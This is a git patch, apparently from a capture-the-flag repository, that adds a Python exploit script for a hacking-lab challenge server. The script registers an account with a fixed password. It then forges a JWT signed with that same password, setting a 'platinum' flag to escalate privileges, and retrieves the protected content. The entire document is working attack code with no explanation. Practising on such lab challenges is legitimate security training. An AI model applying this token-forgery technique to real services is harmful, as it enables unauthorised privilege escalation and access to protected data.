From fe3774642f4fcbe4f2039647dd4a23a623ec47a0 Mon Sep 17 00:00:00 2001 From: Roman Hergenreder Date: Wed, 11 Dec 2019 00:46:00 +0100 Subject: [PATCH] Day 11 solved --- Day 11/exploit.py | 46 ++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 46 insertions(+) create mode 100644 Day 11/exploit.py diff --git a/Day 11/exploit.py b/Day 11/exploit.py new file mode 100644 index 0000000..587dd7b --- /dev/null +++ b/Day 11/exploit.py @@ -0,0 +1,46 @@ +#!/usr/bin/python + +import jwt +import requests +import sys +import prompt +import json +import time + +URL = "http://whale.hacking-lab.com:10101" +USERNAME = prompt.string("Username: ") if len(sys.argv) < 2 else sys.argv[1] +PASSWORD = "AAAAAAAAAAAAAAAA" + +def registerUser(): + payload = json.dumps({"username":USERNAME,"password":PASSWORD}) + res = requests.post(URL + "/fsja/register", data=payload, headers={"Content-Type":"application/json"}) + if res.status_code != 200: + data = res.text + if res.status_code == 409 and json.loads(data)["errorMessage"] == "User already exists": + return + + print("Server returned %d %s" % (res.status_code, res.reason)) + print(res.text) + exit(1) + +def getFlag(): + payload = { + "user": { + "username": USERNAME, + "platinum": True + }, + "exp": time.time() + 60*60 + } + + jwtPayload = jwt.encode(payload, PASSWORD, algorithm='HS256').decode("UTF-8") + res = requests.get(URL + "/fsja/random?token=%s" % jwtPayload) + if res.status_code != 200 and res.status_code != 201: + print("Server returned %d %s" % (res.status_code, res.reason)) + print(res.text) + exit(1) + + data = res.text + print(json.loads(data)["joke"]) + +registerUser() +getFlag()